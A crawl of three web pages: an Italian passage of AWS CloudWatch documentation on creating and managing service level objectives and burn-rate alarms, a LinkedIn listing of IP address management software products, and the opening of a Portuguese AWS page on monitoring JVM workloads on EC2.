paio di allarmi, uno con una finestra di tre giorni e l'altro con una finestra di sei ore. I passaggi per effettuare questa configurazione sono i seguenti: Crea cinque indici di consumo, con finestre di cinque minuti, 30 minuti, un'ora, sei ore e tre giorni. Crea le seguenti tre coppie di allarmi CloudWatch. Ogni coppia include una finestra lunga e una finestra breve pari a 1/12 della finestra lunga, e le soglie vengono determinate utilizzando i passaggi in Determina la soglia appropriata per un allarme relativo all'indice di consumo . Quando calcoli la soglia per ogni allarme della coppia, utilizza la finestra di visualizzazione retrospettiva più lunga della coppia nel calcolo. Allarmi sugli indici di consumo a 1 ora e 5 minuti (la soglia è determinata dal 2% del budget totale) Allarmi sugli indici di consumo a 6 ore e 30 minuti (la soglia è determinata dal 5% del budget totale) Allarmi sugli indici di consumo a 3 giorni e 6 ore (la soglia è determinata dal 10% del budget totale) Per ognuna di queste coppie, crea un allarme composito per essere avvisato quando entrambi i singoli allarmi entrano nello stato ALARM. Per ulteriori informazioni sulla creazione di allarmi compositi, consulta Create a composite alarm . Ad esempio, se gli allarmi per la prima coppia (finestra di un'ora e finestra di cinque minuti) sono denominati OneHourBurnRate e FiveMinuteBurnRate , la regola di allarme composito di CloudWatch sarebbe ALARM(OneHourBurnRate) AND ALARM(FiveMinuteBurnRate) La strategia precedente è possibile solo per SLO con intervalli di almeno tre ore. Per gli SLO con intervalli più brevi, consigliamo di iniziare con un paio di allarmi di indice di consumo, in cui un allarme ha una finestra di visualizzazione retrospettiva pari a 1/12 di quella dell'altro allarme. Quindi, procedi impostando un allarme composito su questa coppia. Creazione di uno SLO. Ti consigliamo di impostare SLO sia di latenza che di disponibilità sulle tue applicazioni critiche. Questi parametri raccolti da Application Signals sono in linea con gli obiettivi aziendali comuni. Puoi anche impostare gli SLO su qualsiasi parametro CloudWatch o su qualsiasi espressione matematica dei parametri che dia come risultato una singola serie temporale. La prima volta che crei uno SLO nel tuo account, CloudWatch crea automaticamente il ruolo collegato al servizio AWSServiceRoleForCloudWatchApplicationSignals nel tuo account, se non esiste ancora. Questo ruolo collegato al servizio consente a CloudWatch di raccogliere i dati di CloudWatch Logs, i dati delle tracce X-Ray, i dati delle metriche di CloudWatch e i dati di tagging dalle applicazioni nel tuo account. Per ulteriori informazioni sui ruoli collegati al servizio di CloudWatch, consulta Utilizzo di ruoli collegati ai servizi per CloudWatch . Quando crei uno SLO, specifica se si tratta di uno SLO basato sul periodo o uno SLO basato su richiesta . Ogni tipo di SLO ha un modo diverso di valutare le prestazioni dell'applicazione rispetto all'obiettivo di raggiungimento. Uno SLO basato sul periodo utilizza periodi di tempo definiti all'interno di un intervallo di tempo totale specificato. Per ogni periodo di tempo, Application Signals determina se l'applicazione ha raggiunto il suo obiettivo. Il tasso di raggiungimento viene calcolato come number of good periods/number of total periods . Ad esempio, per uno SLO basato sul periodo, soddisfare un obiettivo di raggiungimento del 99,9% significa che, nell'intervallo stabilito, l'applicazione deve raggiungere il proprio obiettivo di prestazioni per almeno il 99,9% dei periodi di tempo. Uno SLO basato su richiesta non utilizza periodi di tempo predefiniti. Invece, lo SLO misura number of good requests/number of total requests durante l'intervallo. In qualsiasi momento, puoi trovare il rapporto tra le richieste valide e le richieste totali per l'intervallo fino al timestamp specificato e misurare tale rapporto rispetto all'obiettivo impostato nel tuo SLO. Argomenti Creazione di uno SLO basato sul periodo Creazione di uno SLO basato su richiesta Creazione di uno SLO basato sul periodo Per creare uno SLO basato sul periodo, utilizza la procedura seguente. Per creare uno SLO basato sul periodo Apri la console CloudWatch all'indirizzo https://console.aws.amazon.com/cloudwatch/ . Nel riquadro di navigazione scegli Obiettivi del livello di servizio (SLO) . Scegli Crea SLO . Inserisci un nome per lo SLO. L'inclusione del nome di un servizio o di un'operazione, insieme a parole chiave appropriate come latenza o disponibilità, ti aiuterà a identificare rapidamente cosa indica lo stato SLO durante la valutazione. In Imposta l'indicatore del livello di servizio (SLI) , effettua una delle seguenti operazioni: Per impostare lo SLO su uno dei parametri dell'applicazione standard Latency o Availability : Seleziona Operazione del servizio . Seleziona un account che lo SLO monitorerà. Seleziona il servizio che lo SLO monitorerà. Seleziona l'operazione che lo SLO monitorerà. Per Seleziona un metodo di calcolo , scegli Periodi . I menu a discesa Seleziona servizio e Seleziona operazione sono popolati da servizi e operazioni che sono stati attivi nelle ultime 24 ore. Seleziona Disponibilità o Latenza , quindi imposta la soglia. Per impostare lo SLO su qualsiasi parametro CloudWatch o su un'espressione matematica del parametro CloudWatch: Scegli Parametro CloudWatch . Scegli Seleziona parametro CloudWatch . Viene visualizzata la schermata Seleziona parametro . Utilizza le schede Sfoglia o Query per trovare il parametro desiderato oppure crea un'espressione matematica del parametro. Dopo aver selezionato il parametro desiderato, scegli la scheda Parametri nel grafico e seleziona le statistiche e il periodo da utilizzare per lo SLO. Quindi, scegli Seleziona parametro . Per informazioni su queste schermate, consulta Rappresentazione grafica di un parametro e Aggiungi un'espressione matematica a un grafico CloudWatch . Per Seleziona un metodo di calcolo , scegli Periodi . Per Imposta condizione , seleziona un operatore di confronto e una soglia per lo SLO da utilizzare come indicatore di successo. Per impostare lo SLO sulla dipendenza di un servizio da una delle metriche applicative standard Latency o Availability : Scegli Dipendenza del servizio . In Seleziona un servizio , seleziona il servizio che lo SLO monitorerà. In base al servizio selezionato, in Seleziona un'operazione , puoi selezionare un'operazione specifica o selezionare Tutte le operazioni per utilizzare le metriche di tutte le operazioni di questo servizio che richiama una dipendenza. In Seleziona una dipendenza , puoi cercare e selezionare la dipendenza richiesta per la quale desideri misurare l'affidabilità. Dopo aver selezionato la dipendenza, puoi visualizzare il grafico aggiornato e i dati storici in base alla dipendenza. Se hai selezionato Operazione del servizio o Dipendenza del servizio nel passaggio 5, imposta la durata del periodo per questo SLO. Imposta l' intervallo e l' obiettivo di raggiungimento per lo SLO. Per ulteriori informazioni sugli intervalli e sugli obiettivi di raggiungimento e su come interagiscono tra loro, consulta Concetti di SLO . (Facoltativo) Per Imposta gli indici di consumo dello SLO , effettua le seguenti operazioni: Imposta la durata (in minuti) della finestra di visualizzazione retrospettiva per l'indice di consumo. Per informazioni su come scegliere questa durata, consulta Procedure dettagliate per gli allarmi relativi all'indice di consumo . Per creare più indici di consumo per questo SLO, scegli Aggiungi altri indici di consumo e imposta la finestra di visualizzazione retrospettiva per gli indici di consumo aggiuntivi. (Facoltativo) Crea allarmi relativi all'indice di consumo eseguendo queste operazioni: In Imposta allarmi relativi all'indice di consumo seleziona la casella di controllo per ogni indice di consumo per il quale vuoi creare un allarme. Per ciascuno di questi allarmi, procedi come segue: Specifica l'argomento Amazon SNS da utilizzare per le notifiche quando l'allarme entra in stato ALARM. Imposta una soglia di indice di consumo oppure specifica la percentuale del budget totale stimato consumata nell'ultima finestra di visualizzazione retrospettiva che desideri non superare. Se imposti la percentuale del budget totale stimato consumata, la soglia dell'indice di consumo viene calcolata automaticamente e utilizzata nell'allarme. Per decidere quale soglia impostare o per capire come utilizzare questa opzione per calcolare la soglia dell'indice di consumo, consulta Determina la soglia appropriata per un allarme relativo all'indice di consumo . (Facoltativo) Imposta uno o più allarmi CloudWatch o una soglia di avviso per lo SLO. Gli allarmi CloudWatch possono utilizzare Amazon SNS per avvisarti proattivamente se un'applicazione non è integra in base alle sue prestazioni SLI. Per creare un allarme, seleziona una delle caselle di controllo relative agli allarmi e inserisci o crea l'argomento Amazon SNS da utilizzare per le notifiche quando l'allarme entra nello stato ALARM . Per ulteriori informazioni su CloudWatch, consulta Utilizzo degli CloudWatch allarmi Amazon . La creazione di allarmi comporta addebiti. Per ulteriori informazioni sui prezzi di CloudWatch, consulta Prezzi di Amazon CloudWatch . Se imposti una soglia di avviso, questa viene visualizzata nelle schermate di Application Signals per aiutarti a identificare gli SLO che rischiano di non essere raggiunti, anche se al momento sono integri. Per impostare una soglia di avviso, inserisci il valore della soglia in Soglia di avviso . Quando il budget di errore dello SLO è inferiore alla soglia di avviso, lo SLO viene contrassegnato con un avviso in diverse schermate di Application Signals. Le soglie di avviso vengono visualizzate anche nei grafici del budget di errore. Puoi anche creare un allarme di avviso per lo SLO basato sulla soglia di avviso. (Facoltativo) Per Imposta l'esclusione della finestra temporale SLO , procedi come segue: In Escludi finestra temporale , imposta la finestra temporale da escludere dalle metriche delle prestazioni SLO. Puoi scegliere Imposta finestra temporale e accedere alla Finestra di avvio per ogni ora o mese, oppure puoi scegliere Imposta finestra temporale con CRON e inserire l'espressione CRON. In Ripeti , imposta se l'esclusione di questa finestra temporale è ricorrente o meno. (Facoltativo) In Aggiungi motivo , puoi scegliere di inserire un motivo per l'esclusione della finestra temporale. Prendiamo come esempio la manutenzione programmata. Seleziona Aggiungi finestra temporale per aggiungere fino a 10 finestre di esclusione temporale. Per aggiungere tag a questo SLO, scegli la scheda Tag , quindi scegli Aggiungi nuovo tag . I tag possono aiutarti a gestire, identificare, organizzare, cercare e filtrare le risorse. Per ulteriori informazioni sui tag, consulta Tagging delle risorse AWS . Nota Se l'applicazione a cui è correlato questo SLO è registrata in AWS Service Catalog AppRegistry, puoi utilizzare il tag awsApplication per associare questo SLO all'applicazione in AppRegistry. Per ulteriori informazioni, consulta Che cos'è AppRegistry? Scegli Crea SLO . Se hai scelto anche di creare uno o più allarmi, il nome del pulsante cambia di conseguenza. Creazione di uno SLO basato su richiesta Per creare un SLO basato su richiesta, utilizza la procedura seguente. Creazione di un SLO basato su richiesta Apri la console CloudWatch all'indirizzo https://console.aws.amazon.com/cloudwatch/ . Nel riquadro di navigazione scegli Obiettivi del livello di servizio (SLO) . Scegli Crea SLO . Inserisci un nome per lo SLO. L'inclusione del nome di un servizio o di un'operazione, insieme a parole chiave appropriate come latenza o disponibilità, ti aiuterà a identificare rapidamente cosa indica lo stato SLO durante la valutazione. In Imposta l'indicatore del livello di servizio (SLI) , effettua una delle seguenti operazioni: Per impostare lo SLO su uno dei parametri dell'applicazione standard Latency o Availability : Seleziona Operazione del servizio . Seleziona il servizio che lo SLO monitorerà. Seleziona l'operazione che lo SLO monitorerà. Per Seleziona un metodo di calcolo , scegli Richieste . I menu a discesa Seleziona servizio e Seleziona operazione sono popolati da servizi e operazioni che sono stati attivi nelle ultime 24 ore. Scegli Disponibilità o Latenza . Se scegli Latenza , imposta la soglia. Per impostare lo SLO su qualsiasi parametro CloudWatch o su un'espressione matematica del parametro CloudWatch: Scegli Parametro CloudWatch . Per Definisci le richieste target , procedi come segue: Scegli se misurare le Richieste valide o le Richieste non valide . Scegli Seleziona parametro CloudWatch . Questa metrica sarà il numeratore del rapporto tra le richieste target e le richieste totali. Se utilizzi una metrica di latenza, utilizza le statistiche Trimmed count (TC) . Se la soglia è 9 ms e stai utilizzando l'operatore di confronto inferiore a (<), utilizza la soglia TC (:threshold - 1). Per ulteriori informazioni su TC, consulta Sintassi . Viene visualizzata la schermata Seleziona parametro . Utilizza le schede Sfoglia o Query per trovare il parametro desiderato oppure crea un'espressione matematica del parametro. Per Definisci le richieste totali , scegli la metrica CloudWatch che desideri utilizzare come origine. Questa metrica sarà il denominatore del rapporto tra le richieste target e le richieste totali. Viene visualizzata la schermata Seleziona parametro . Utilizza le schede Sfoglia o Query per trovare il parametro desiderato oppure crea un'espressione matematica del parametro. Dopo aver selezionato il parametro desiderato, scegli la scheda Parametri nel grafico e seleziona le statistiche e il periodo da utilizzare per lo SLO. Quindi, scegli Seleziona parametro . Se utilizzi una metrica di latenza che emette un punto dati per richiesta, utilizza le statistiche del conteggio dei campioni per contare il numero di richieste totali. Per informazioni su queste schermate, consulta Rappresentazione grafica di un parametro e Aggiungi un'espressione matematica a un grafico CloudWatch . Per impostare lo SLO sulla dipendenza di un servizio da una delle metriche applicative standard Latency o Availability : Scegli Dipendenza del servizio . In Seleziona un servizio , seleziona il servizio che lo SLO monitorerà. In base al servizio selezionato, in Seleziona un'operazione , puoi selezionare un'operazione specifica o selezionare Tutte le operazioni per utilizzare le metriche di tutte le operazioni di questo servizio che richiama una dipendenza. In Seleziona una dipendenza , puoi cercare e selezionare la dipendenza richiesta per la quale desideri misurare l'affidabilità. Dopo aver selezionato la dipendenza, puoi visualizzare il grafico aggiornato e i dati storici in base alla dipendenza. Imposta l' intervallo e l' obiettivo di raggiungimento per lo SLO. Per ulteriori informazioni sugli intervalli e sugli obiettivi di raggiungimento e su come interagiscono tra loro, consulta Concetti di SLO . (Facoltativo) Per Imposta gli indici di consumo dello SLO , effettua le seguenti operazioni: Imposta la durata (in minuti) della finestra di visualizzazione retrospettiva per l'indice di consumo. Per informazioni su come scegliere questa durata, consulta Procedure dettagliate per gli allarmi relativi all'indice di consumo . Per creare più indici di consumo per questo SLO, scegli Aggiungi altri indici di consumo e imposta la finestra di visualizzazione retrospettiva per gli indici di consumo aggiuntivi. (Facoltativo) Crea allarmi relativi all'indice di consumo eseguendo queste operazioni: In Imposta allarmi relativi all'indice di consumo seleziona la casella di controllo per ogni indice di consumo per il quale vuoi creare un allarme. Per ciascuno di questi allarmi, procedi come segue: Specifica l'argomento Amazon SNS da utilizzare per le notifiche quando l'allarme entra in stato ALARM. Imposta una soglia di indice di consumo oppure specifica la percentuale del budget totale stimato consumata nell'ultima finestra di visualizzazione retrospettiva che desideri non superare. Se imposti la percentuale del budget totale stimato consumata, la soglia dell'indice di consumo viene calcolata automaticamente e utilizzata nell'allarme. Per decidere quale soglia impostare o per capire come utilizzare questa opzione per calcolare la soglia dell'indice di consumo, consulta Determina la soglia appropriata per un allarme relativo all'indice di consumo . (Facoltativo) Imposta uno o più allarmi CloudWatch o una soglia di avviso per lo SLO. Gli allarmi CloudWatch possono utilizzare Amazon SNS per avvisarti proattivamente se un'applicazione non è integra in base alle sue prestazioni SLI. Per creare un allarme, seleziona una delle caselle di controllo relative agli allarmi e inserisci o crea l'argomento Amazon SNS da utilizzare per le notifiche quando l'allarme entra nello stato ALARM . Per ulteriori informazioni su CloudWatch, consulta Utilizzo degli CloudWatch allarmi Amazon . La creazione di allarmi comporta addebiti. Per ulteriori informazioni sui prezzi di CloudWatch, consulta Prezzi di Amazon CloudWatch . Se imposti una soglia di avviso, questa viene visualizzata nelle schermate di Application Signals per aiutarti a identificare gli SLO che rischiano di non essere raggiunti, anche se al momento sono integri. Per impostare una soglia di avviso, inserisci il valore della soglia in Soglia di avviso . Quando il budget di errore dello SLO è inferiore alla soglia di avviso, lo SLO viene contrassegnato con un avviso in diverse schermate di Application Signals. Le soglie di avviso vengono visualizzate anche nei grafici del budget di errore. Puoi anche creare un allarme di avviso per lo SLO basato sulla soglia di avviso. (Facoltativo) Per Imposta l'esclusione della finestra temporale SLO , procedi come segue: In Escludi finestra temporale , imposta la finestra temporale da escludere dalle metriche delle prestazioni SLO. Puoi scegliere Imposta finestra temporale e accedere alla Finestra di avvio per ogni ora o mese, oppure puoi scegliere Imposta finestra temporale con CRON e inserire l'espressione CRON. In Ripeti , imposta se l'esclusione di questa finestra temporale è ricorrente o meno. (Facoltativo) In Aggiungi motivo , puoi scegliere di inserire un motivo per l'esclusione della finestra temporale. Prendiamo come esempio la manutenzione programmata. Seleziona Aggiungi finestra temporale per aggiungere fino a 10 finestre di esclusione temporale. Per aggiungere tag a questo SLO, scegli la scheda Tag , quindi scegli Aggiungi nuovo tag . I tag possono aiutarti a gestire, identificare, organizzare, cercare e filtrare le risorse. Per ulteriori informazioni sui tag, consulta Tagging delle risorse AWS . Nota Se l'applicazione a cui è correlato questo SLO è registrata in AWS Service Catalog AppRegistry, puoi utilizzare il tag awsApplication per associare questo SLO all'applicazione in AppRegistry. Per ulteriori informazioni, consulta Che cos'è AppRegistry? Scegli Crea SLO . Se hai scelto anche di creare uno o più allarmi, il nome del pulsante cambia di conseguenza. Visualizza e valuta lo stato SLO Puoi visualizzare rapidamente lo stato dei tuoi SLO utilizzando le opzioni Obiettivi del livello di servizio o Servizi nella console CloudWatch. La visualizzazione Servizi offre una panoramica immediata della percentuale di servizi non integri, calcolata in base agli SLO che hai impostato. Per ulteriori informazioni sull'uso dell'opzione Servizi , consulta Monitoraggio dell'integrità operativa delle applicazioni con Application Signals . La visualizzazione Obiettivi del livello di servizio offre una panoramica macro dell'organizzazione. È possibile visualizzare gli SLO soddisfatti e non soddisfatti nel loro complesso. In questo modo puoi avere un'idea di quanti dei tuoi servizi e delle tue operazioni rispondono alle tue aspettative per periodi di tempo più lunghi, in base agli SLI che hai scelto. Per visualizzare tutti gli SLO utilizzando la visualizzazione Obiettivi del livello di servizio Apri la console CloudWatch all'indirizzo https://console.aws.amazon.com/cloudwatch/ . Nel riquadro di navigazione scegli Obiettivi del livello di servizio (SLO) . Viene visualizzato l'elenco Obiettivi del livello di servizio (SLO) . Puoi visualizzare rapidamente lo stato attuale degli SLO nella colonna Stato SLI . Per ordinare gli SLO in modo che tutti gli SLO non integri siano in cima all'elenco, scegli la colonna dello stato SLI finché gli SLO non integri non saranno tutti in cima alla lista. La tabella dello SLO contiene le colonne predefinite riportate di seguito. Puoi modificare le colonne da visualizzare selezionando l'icona a forma di ingranaggio sopra l'elenco. Per ulteriori informazioni su obiettivi, SLI, raggiungimento e intervalli, consulta Concetti di SLO . Il nome dello SLO. La colonna Obiettivo mostra la percentuale di periodi di ogni intervallo che devono soddisfare correttamente la soglia SLI affinché venga raggiunto l'obiettivo SLO. Mostra anche la durata dell'intervallo per lo SLO. Lo stato SLI indica l'integrità dello stato operativo corrente dell'applicazione. Se un periodo dell'intervallo di tempo attualmente selezionato non era integro per lo SLO, lo stato SLI mostra Non integro . Se questo SLO è configurato per monitorare una dipendenza, le colonne Dipendenza e Operazione remota mostreranno i dettagli su quella relazione di dipendenza. Il raggiungimento finale è il livello di successo raggiunto alla fine dell'intervallo di tempo selezionato. Ordina in base a questa colonna per vedere gli SLO che rischiano maggiormente di non essere rispettati. Il delta di raggiungimento è la differenza nel livello di raggiungimento tra l'inizio e la fine dell'intervallo di tempo selezionato. Un delta negativo indica che il parametro tende verso il basso. Ordina in base a questa colonna per vedere le tendenze più recenti degli SLO. Il budget di errore finale (%) è la percentuale di tempo totale all'interno del periodo in cui è possibile che si verifichino periodi non integri senza impedire che lo SLO sia raggiunto con successo. Se lo si imposta al 5% e lo SLI non è integro nel 5% o meno dei periodi rimanenti dell'intervallo, lo SLO viene comunque raggiunto con successo. Il delta del budget di errore è la differenza nel budget di errore tra l'inizio e la fine dell'intervallo di tempo selezionato. Un delta negativo indica che il parametro tende verso la non riuscita. Il budget di errore finale (tempo) è la quantità di tempo effettivo nell'intervallo che può essere non integro senza impedire che lo SLO sia raggiunto con successo. Ad esempio, se si tratta di 14 minuti, se lo SLI non è integro per meno di 14 minuti durante l'intervallo rimanente, lo SLO verrà comunque raggiunto con successo. Il budget di errore finale (richieste) è la quantità di richieste nell'intervallo che può essere non integro senza impedire che lo SLO sia raggiunto correttamente. Per gli SLO basati su richieste, questo valore è dinamico e può cambiare al variare del numero totale cumulativo di richieste nel tempo. Le colonne Servizio , Operazione e Tipo mostrano informazioni sul servizio e sull'operazione per cui è impostato questo SLO. Per visualizzare i grafici del raggiungimento e del budget di errore per uno SLO, seleziona il pulsante di opzione accanto al nome dello SLO. I grafici nella parte superiore della pagina mostrano il raggiungimento dello SLO e lo stato del budget di errore. Viene inoltre visualizzato un grafico sul parametro SLI associato a questo SLO. Per valutare ulteriormente uno SLO che non soddisfa il suo obiettivo, scegli il nome del servizio, dell'operazione o della dipendenza associato a tale SLO. Verrà visualizzata la pagina dei dettagli dove puoi effettuare ulteriori operazioni di valutazione. Per ulteriori informazioni, consulta Visualizzazione dell'attività dettagliata del servizio e dell'integrità operativa tramite la pagina dei dettagli del servizio . Per modificare l'intervallo di tempo dei grafici e delle tabelle sulla pagina, scegli un nuovo intervallo di tempo nella parte superiore dello schermo. Modifica di uno SLO esistente Segui questa procedura per modificare uno SLO esistente. Quando modifichi uno SLO, puoi cambiare solo la soglia, l'intervallo, l'obiettivo di raggiungimento e i tag. Per modificare altri aspetti come il servizio, l'operazione o il parametro, crea un nuovo SLO invece di modificarne uno esistente. La modifica di parte di una configurazione principale dello SLO, come il periodo o la soglia, invalida tutti i dati e le valutazioni precedenti relativi al raggiungimento e all'integrità. Questa operazione elimina e ricrea efficacemente lo SLO. Nota Quando modifichi uno SLO, gli allarmi associati non vengono aggiornati automaticamente. Potrebbe essere necessario aggiornare gli allarmi per mantenerli sincronizzati con lo SLO. Per modificare uno SLO esistente Apri la console CloudWatch all'indirizzo https://console.aws.amazon.com/cloudwatch/ . Nel riquadro di navigazione scegli Obiettivi del livello di servizio (SLO) . Scegli il pulsante di opzione accanto allo SLO che desideri modificare, quindi scegli Operazioni , Modifica SLO . Apporta le modifiche desiderate e seleziona Salva modifiche . Eliminazione di uno SLO Segui questa procedura per eliminare uno SLO esistente. Nota Quando elimini uno SLO, gli allarmi associati non vengono eliminati automaticamente. Sarà necessario eliminarli manualmente. Per ulteriori informazioni, consulta Gestione degli allarmi . Per eliminare uno SLO Apri la console CloudWatch all'indirizzo https://console.aws.amazon.com/cloudwatch/ . Nel riquadro di navigazione scegli Obiettivi del livello di servizio (SLO) . Scegli il pulsante di opzione accanto allo SLO che desideri modificare, quindi scegli Operazioni , Elimina SLO . Scegli Conferma . JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Metriche personalizzate con Application Signals Transaction Search Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/categories/ip-address-management-software?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_subtitle-click | Best IP Address Management (IPAM) Software | Products | LinkedIn Skip to main content LinkedIn Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Clear text Used by Used by Network Engineer (2) Information Technology Administrator (2) Network Specialist (2) Information Technology Network Administrator (1) Information Technology Operations Analyst (1) See all products Find top products in IP Address Management (IPAM) Software category Software used to plan and manage the use of IP addresses on a network. - Use unique IP addresses for applications, devices, and related resources - Prevent conflicts and errors with automated audits and network discovery - Use IPv4/IPv6 support and integrate with DNS and DHCP services - View subnet capacity and optimize IP planning space 9 results Next-Gen IPAM IP Address Management (IPAM) Software by IPXO Next-Gen IPAM is designed to simplify and automate public IP resource management. It supports both IPv4 and IPv6, and is built with a focus on automation, transparency, and security. You get a centralized view of IP reputation, WHOIS data, RPKI validation, BGP routing, and geolocation – all in one automated platform. View product AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software by Axiros AX DHCP server is a clusterable carrier-grade DHCP / IPAM (IP Address Management) solution that can be seamlessly integrated within given provisioning platforms. AX DHCP copes with FttH, ONT provisioning, VOIP and IPTV services. Telecommunications carriers and internet service providers (ISPs) need powerful and robust infrastructure that supports future workloads. DDI (DNS-DHCP-IPAM) is a critical networking technology for every service provider that ensures customer services availability, security and performance. View product Tidal LightMesh IP Address Management (IPAM) Software by Tidal Go beyond IP Address Management (IPAM) with LightMesh from Tidal. Simplify and automate the administration and management of internet protocol networks. LightMesh makes IP visibility and operation scalable, secure and self-controlled with a central feature-rich interface, reducing complexity, and – all for free. Currently in Public Beta. View product ManageEngine OpUtils IP Address Management (IPAM) Software by ManageEngine ITOM OpUtils is an IP address and switch port management software that is geared towards helping engineers efficiently monitor, diagnose, and troubleshoot IT resources. OpUtils complements existing management tools by providing troubleshooting and real-time monitoring capabilities. It helps network engineers manage their switches and IP address space with ease. With a comprehensive set of over 20 tools, this switch port management tool helps with network monitoring tasks like detecting a rogue device intrusion, keeping an eye on bandwidth usage, monitoring the availability of critical devices, backing up Cisco configuration files, and more. View product Numerus IP Address Management (IPAM) Software by TechNarts-Nart Bilişim Numerus, a mega-scale enterprise-level IP address management tool, helps simplify and automate several tasks related to IP space management. It can manage IP ranges, pools, and VLANs, monitor the hierarchy, manage utilizations and capacities, perform automated IP address assignments, and report assignments to registries with regular synchronization. It provides extensive reporting capabilities and data for 3rd party systems with various integrations. For ISPs, it also provides global IP Registry integrations such as RIPE. View product Find products trusted by professionals in your network See which products are used by connections in your network and those that share similar job titles Sign in to view full insights dedicated datacenter proxies IP Address Management (IPAM) Software by Decodo You can now own IP addresses that are solely yours! SOCKS5 and HTTP(S) proxies that no one else can lay their hands on when you’re using them. View product AX DHCP | Gerenciamento de endereços IP IP Address Management (IPAM) Software by Axiros LATAM O AX DHCP é uma solução DHCP/IPAM que pode ser integrada de forma transparente em determinadas plataformas de provisionamento como FTTH, ONT, VOIP e IPTV. As operadoras de telecomunicações e os provedores de serviços de Internet precisam de uma infraestrutura poderosa e robusta que suporte cargas de trabalho futuras. DDI (DNS-DHCP-IPAM) é uma tecnologia de rede crítica para provedores de serviços que garante a disponibilidade, segurança e desempenho dos serviços ao cliente. … AX DHCP es una solución DHCP/IPAM que se puede integrar perfectamente en determinadas plataformas de aprovisionamiento como FTTH, ONT, VOIP e IPTV. Los operadores de telecomunicaciones y los proveedores de servicios de Internet necesitan una infraestructura potente y robusta para admitir futuras cargas de trabajo. DDI (DNS-DHCP-IPAM) es una tecnología de red fundamental para proveedores de servicios que garantiza la disponibilidad, la seguridad y el rendimiento de los servicios al cliente. View product Cygna runIP Appliance Platform IP Address Management (IPAM) Software by Cygna Labs Deutschland Maximizing the benefits of your DDI-Solution VitalQIP (Nokia) | DiamondIP (BT DiamondIP) | Micetro (Men & Mice) By providing an efficient solution for roll-out, configuration, patching and upgrades of DNS and DHCP servers, the runIP Management Platform optimizes the efficiency and value of your DDI investment. To create runIP, N3K combined the experience gained from setting up thousands of DNS & DHCP servers and hundreds of DDI environments into one holistic solution. runIP is suitable both for those companies that want to further reduce the operating costs of their existing DDI installation and for those that want to make their initial installation or further roll-out even more efficient and successful. The runIP solution is completed by its integrated, comprehensive real-time monitoring of the DNS and DHCP services and operating system and extensive long-term statistics. This ensures that you always have an overview of the DNS and DHCP services as well as the operating system. View product See more How it works Explore Discover the best product for your need from a growing catalog of 25,000 products and categories trusted by LinkedIn professionals Learn Evaluate new tools, explore trending products in your industry and see who in your network is skilled in the product Grow Join communities of product users to learn best practices, celebrate your progress and accelerate your career LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English Language | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/Solution-JVM-On-EC2.html#Solution-JVM-CloudWatch-Agent | Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Solução do CloudWatch: workload da JVM no Amazon EC2 Esta solução auxilia na configuração da coleta de métricas prontas para uso com agentes do CloudWatch para aplicações da JVM que estão sendo executadas em instâncias do EC2. Além disso, a solução ajuda na configuração de um painel do CloudWatch configurado previamente. Para obter informações gerais sobre todas as soluções de observabilidade do CloudWatch, consulte Soluções de observabilidade do CloudWatch . Tópicos Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Requisitos Esta solução é aplicável nas seguintes condições: Versões compatíveis: versões LTS do Java 8, 11, 17 e 21 Computação: Amazon EC2 Fornecimento de suporte para até 500 instâncias do EC2 em todas as workloads da JVM em uma Região da AWS específica Versão mais recente do agente do CloudWatch SSM Agent instalado na instância do EC2 nota O AWS Systems Manager (SSM Agent) está instalado previamente em algumas imagens de máquinas da Amazon (AMIs) fornecidas pela AWS e por entidades externas confiáveis. Se o agente não estiver instalado, você poderá instalá-lo manualmente usando o procedimento adequado para o seu tipo de sistema operacional. Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Linux Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para macOS Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Windows Server Benefícios A solução disponibiliza monitoramento da JVM, fornecendo insights valiosos para os seguintes casos de uso: Monitoramento do uso de memória do heap e de memória não relacionada ao heap da JVM. Análise de threads e de carregamento de classes para identificar problemas de simultaneidade. Rastreamento da coleta de resíduos para identificar possíveis vazamentos de memória. Alternância entre diferentes aplicações da JVM configuradas pela solução na mesma conta. A seguir, apresentamos as principais vantagens da solução: Automatiza a coleta de métricas para a JVM usando a configuração do agente do CloudWatch, o que elimina a necessidade de instrumentação manual. Fornece um painel do CloudWatch consolidado e configurado previamente para as métricas da JVM. O painel gerenciará automaticamente as métricas das novas instâncias do EC2 para a JVM que foram configuradas usando a solução, mesmo que essas métricas não estejam disponíveis no momento de criação do painel. Além disso, o painel permite agrupar as métricas em aplicações lógicas para facilitar o foco e o gerenciamento. A imagem apresentada a seguir é um exemplo do painel para esta solução. Custos Esta solução cria e usa recursos em sua conta. A cobrança será realizada com base no uso padrão, que inclui o seguinte: Todas as métricas coletadas pelo agente do CloudWatch são cobradas como métricas personalizadas. O número de métricas usadas por esta solução depende do número de hosts do EC2. Cada host da JVM configurado para a solução publica um total de 18 métricas, além de uma métrica ( disk_used_percent ) cuja contagem de métricas depende do número de caminhos fornecidos para o host. Um painel personalizado. As operações da API solicitadas pelo agente do CloudWatch para publicar as métricas. Com a configuração padrão para esta solução, o agente do CloudWatch chama a operação 